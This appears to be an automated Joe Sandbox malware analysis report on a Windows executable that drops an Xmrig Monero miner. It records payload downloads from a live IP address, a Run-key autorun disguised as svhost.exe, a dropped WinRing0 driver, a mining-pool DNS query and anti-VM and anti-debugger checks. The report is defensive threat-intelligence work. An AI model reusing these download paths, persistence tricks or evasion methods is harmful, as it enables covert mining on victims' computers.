Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4LX9x1PMAW.exe

Overview

General Information

Sample name:4LX9x1PMAW.exe
renamed because original name is a hash value
Original sample name:e211b2b230ef040fe40bc380899990fc.exe
Analysis ID:1487983
MD5:e211b2b230ef040fe40bc380899990fc
SHA1:fe36dbf3efa775193b82ce03d1b329d3feced487
SHA256:666c246bd662275c5a7330b4de2e51a7f86556390c0b79b1d774378e7eac8cb0
Tags:64exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
PE file contains section with special chars
Queries temperature or sensor information (via WMI often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses known network protocols on non-standard ports
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to enumerate network shares
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 4LX9x1PMAW.exe (PID: 5232 cmdline: "C:\Users\user\Desktop\4LX9x1PMAW.exe" MD5: E211B2B230EF040FE40BC380899990FC)
    • windowsaudioservice.exe (PID: 4824 cmdline: "C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe" MD5: BC35928AAFC2827CE620E2AA679AADD5)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3660 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svhost.exe (PID: 6464 cmdline: "C:\Users\user\AppData\Local\Windows\svhost.exe" MD5: E211B2B230EF040FE40BC380899990FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.3325195819.0000000002390000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    Process Memory Space: windowsaudioservice.exe PID: 4824JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: CurrentVersion Autorun Keys Modification
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Windows\svhost.exe , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4LX9x1PMAW.exe, ProcessId: 5232, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 3660, ProcessName: svchost.exe

      Snort Signatures

      Suricata Signatures

      Timestamp:2024-08-05T14:40:53.480891+0200
      SID:2008438
      Source Port:1111
      Destination Port:49722
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeAvira: detection malicious, Label: HEUR/AGEN.1309090
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeReversingLabs: Detection: 21%
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeReversingLabs: Detection: 37%
      Multi AV Scanner detection for submitted file
      Source: 4LX9x1PMAW.exeVirustotal: Detection: 12%Perma Link
      Source: 4LX9x1PMAW.exeReversingLabs: Detection: 21%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6BC9D0 BCryptGenRandom,SystemFunction036,BCryptGenRandom,SystemFunction036,7_2_00007FF7AF6BC9D0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF702830 BCryptGenRandom,7_2_00007FF7AF702830

      Bitcoin Miner

      barindex
      Yara detected Xmrig cryptocurrency miner
      Source: Yara matchFile source: 00000005.00000003.3325195819.0000000002390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: windowsaudioservice.exe PID: 4824, type: MEMORYSTR
      DNS related to crypt mining pools
      Source: unknownDNS query: name: xmr-us-east1.nanopool.org
      Found strings related to Crypto-Mining
      Source: windowsaudioservice.exe, 00000005.00000003.3325195819.0000000002390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
      Source: windowsaudioservice.exe, 00000005.00000003.3325195819.0000000002390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
      Source: windowsaudioservice.exe, 00000005.00000003.3325195819.0000000002390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
      Source: 4LX9x1PMAW.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 4LX9x1PMAW.exe, 00000000.00000003.3229268657.000003647E1F2000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.0.dr
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6D2570 NetUserEnum,NetApiBufferFree,NetUserGetInfo,IsValidSid,GetLengthSid,CopySid,NetUserGetLocalGroups,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,LsaEnumerateLogonSessions,LsaFreeReturnBuffer,LsaGetLogonSessionData,LsaFreeReturnBuffer,LsaFreeReturnBuffer,NetApiBufferFree,7_2_00007FF7AF6D2570

      Networking

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 1111
      Source: unknownNetwork traffic detected: HTTP traffic on port 1111 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 1111
      Source: unknownNetwork traffic detected: HTTP traffic on port 1111 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 1111
      Source: unknownNetwork traffic detected: HTTP traffic on port 1111 -> 49723
      Source: global trafficTCP traffic: 192.168.2.6:49724 -> 51.79.71.77:10343
      Source: global trafficHTTP traffic detected: GET /audiodevice HTTP/1.1accept: */*host: 172.86.76.134:1111
      Source: global trafficHTTP traffic detected: GET /winring HTTP/1.1accept: */*host: 172.86.76.134:1111
      Source: global trafficHTTP traffic detected: GET /svhost HTTP/1.1accept: */*host: 172.86.76.134:1111
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.134
      Source: global trafficHTTP traffic detected: GET /audiodevice HTTP/1.1accept: */*host: 172.86.76.134:1111
      Source: global trafficHTTP traffic detected: GET /winring HTTP/1.1accept: */*host: 172.86.76.134:1111
      Source: global trafficHTTP traffic detected: GET /svhost HTTP/1.1accept: */*host: 172.86.76.134:1111
      Source: global trafficDNS traffic detected: DNS query: xmr-us-east1.nanopool.org
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3189720333.000003647E130000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3197053450.000003647E130000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3210565344.000003647E130000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3186135211.000003647E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://172.86.76.134:1111/audiodevice
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3313848485.00000364802F0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802EF000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3333122127.00000364802E0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3333215380.0000036484212000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802D0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3308693534.00000364841FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: windowsaudioservice.exe, 00000005.00000002.3377767585.0000000000517000.00000004.00000020.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.000000000043C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3343760698.000003648438C000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.00000000004CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364843D6000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.0000000000517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crlS
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364843D6000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.0000000000517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crlxF
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3231341880.000003647E240000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3229268657.000003647E1F2000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.0.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3231341880.000003647E240000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.0.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3231341880.000003647E240000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.0.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3231341880.000003647E240000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.0.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3313848485.00000364802F0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802EF000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3333122127.00000364802E0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3333215380.0000036484212000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802D0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3308693534.00000364841FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3308693534.0000036484160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/DigiCertGlobalRootG2.crl2
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3313848485.00000364802F0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802EF000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3333122127.00000364802E0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3333215380.0000036484212000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802D0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3308693534.00000364841FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.000000000043C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364843D6000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3343760698.000003648438C000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.0000000000517000.00000004.00000020.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.00000000004CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3313848485.00000364802F0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802EF000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3333122127.00000364802E0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3333215380.0000036484212000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802D0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3308693534.00000364841FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3308693534.0000036484160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3333122127.00000364802E0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802D0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3308693534.00000364841F5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: svhost.exe.0.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364843C4000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3335035446.000003648441F000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3335052114.00000364823CC000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3339978275.000003647E3FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e

      System Summary

      barindex
      PE file contains section with special chars
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6D1090 NtQuerySystemInformation,7_2_00007FF7AF6D1090
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF69CF60 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,GetLastError,GetLastError,CloseHandle,7_2_00007FF7AF69CF60
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF69CD60 NtCancelIoFileEx,RtlNtStatusToDosError,7_2_00007FF7AF69CD60
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6D3A60 NtQuerySystemInformation,7_2_00007FF7AF6D3A60
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF698930 NtCancelIoFileEx,RtlNtStatusToDosError,7_2_00007FF7AF698930
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6C7850 NtQuerySystemInformation,NtQuerySystemInformation,7_2_00007FF7AF6C7850
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6FA720 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,SleepConditionVariableSRW,7_2_00007FF7AF6FA720
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6CD6D0 NtQuerySystemInformation,NtQuerySystemInformation,7_2_00007FF7AF6CD6D0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6F9210 CloseHandle,NtCreateFile,RtlNtStatusToDosError,7_2_00007FF7AF6F9210
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6D4400: CreateFileW,GetDiskFreeSpaceExW,DeviceIoControl,CloseHandle,CloseHandle,CloseHandle,7_2_00007FF7AF6D4400
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile created: C:\Users\user\AppData\Local\Windows\WinRing0x64.sysJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF5730807_2_00007FF7AF573080
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF5C70607_2_00007FF7AF5C7060
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF5C60707_2_00007FF7AF5C6070
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF56B1007_2_00007FF7AF56B100
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF613F307_2_00007FF7AF613F30
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6E70107_2_00007FF7AF6E7010
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6BCFF07_2_00007FF7AF6BCFF0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF690FB07_2_00007FF7AF690FB0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF70DF007_2_00007FF7AF70DF00
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF68FE107_2_00007FF7AF68FE10
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF5C5E107_2_00007FF7AF5C5E10
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF633DC07_2_00007FF7AF633DC0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF719CA07_2_00007FF7AF719CA0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF730B907_2_00007FF7AF730B90
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF666A307_2_00007FF7AF666A30
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF7139E07_2_00007FF7AF7139E0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6BF9B07_2_00007FF7AF6BF9B0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF7188B07_2_00007FF7AF7188B0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF5767D07_2_00007FF7AF5767D0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6137A07_2_00007FF7AF6137A0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF73A7107_2_00007FF7AF73A710
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF5C67007_2_00007FF7AF5C6700
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF5B66C07_2_00007FF7AF5B66C0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6D25707_2_00007FF7AF6D2570
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF7136007_2_00007FF7AF713600
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6DF5B07_2_00007FF7AF6DF5B0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF67A5A07_2_00007FF7AF67A5A0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF5B04207_2_00007FF7AF5B0420
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF71B5007_2_00007FF7AF71B500
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6C84207_2_00007FF7AF6C8420
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF7334307_2_00007FF7AF733430
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF7374707_2_00007FF7AF737470
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF7143B07_2_00007FF7AF7143B0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6C64007_2_00007FF7AF6C6400
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF7313307_2_00007FF7AF731330
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6BF3B07_2_00007FF7AF6BF3B0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6C82C07_2_00007FF7AF6C82C0
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF7341307_2_00007FF7AF734130
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF5C61F07_2_00007FF7AF5C61F0
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Windows\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: String function: 00007FF7AF73AF50 appears 110 times
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: String function: 00007FF7AF73AE10 appears 201 times
      Source: windowsaudioservice.exe.0.drStatic PE information: Number of sections : 16 > 10
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364843C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs 4LX9x1PMAW.exe
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3231341880.000003647E240000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinRing0.sys2 vs 4LX9x1PMAW.exe
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3335052114.000003648236A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameApplicationFrameHost.exej% vs 4LX9x1PMAW.exe
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3335035446.000003648441F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs 4LX9x1PMAW.exe
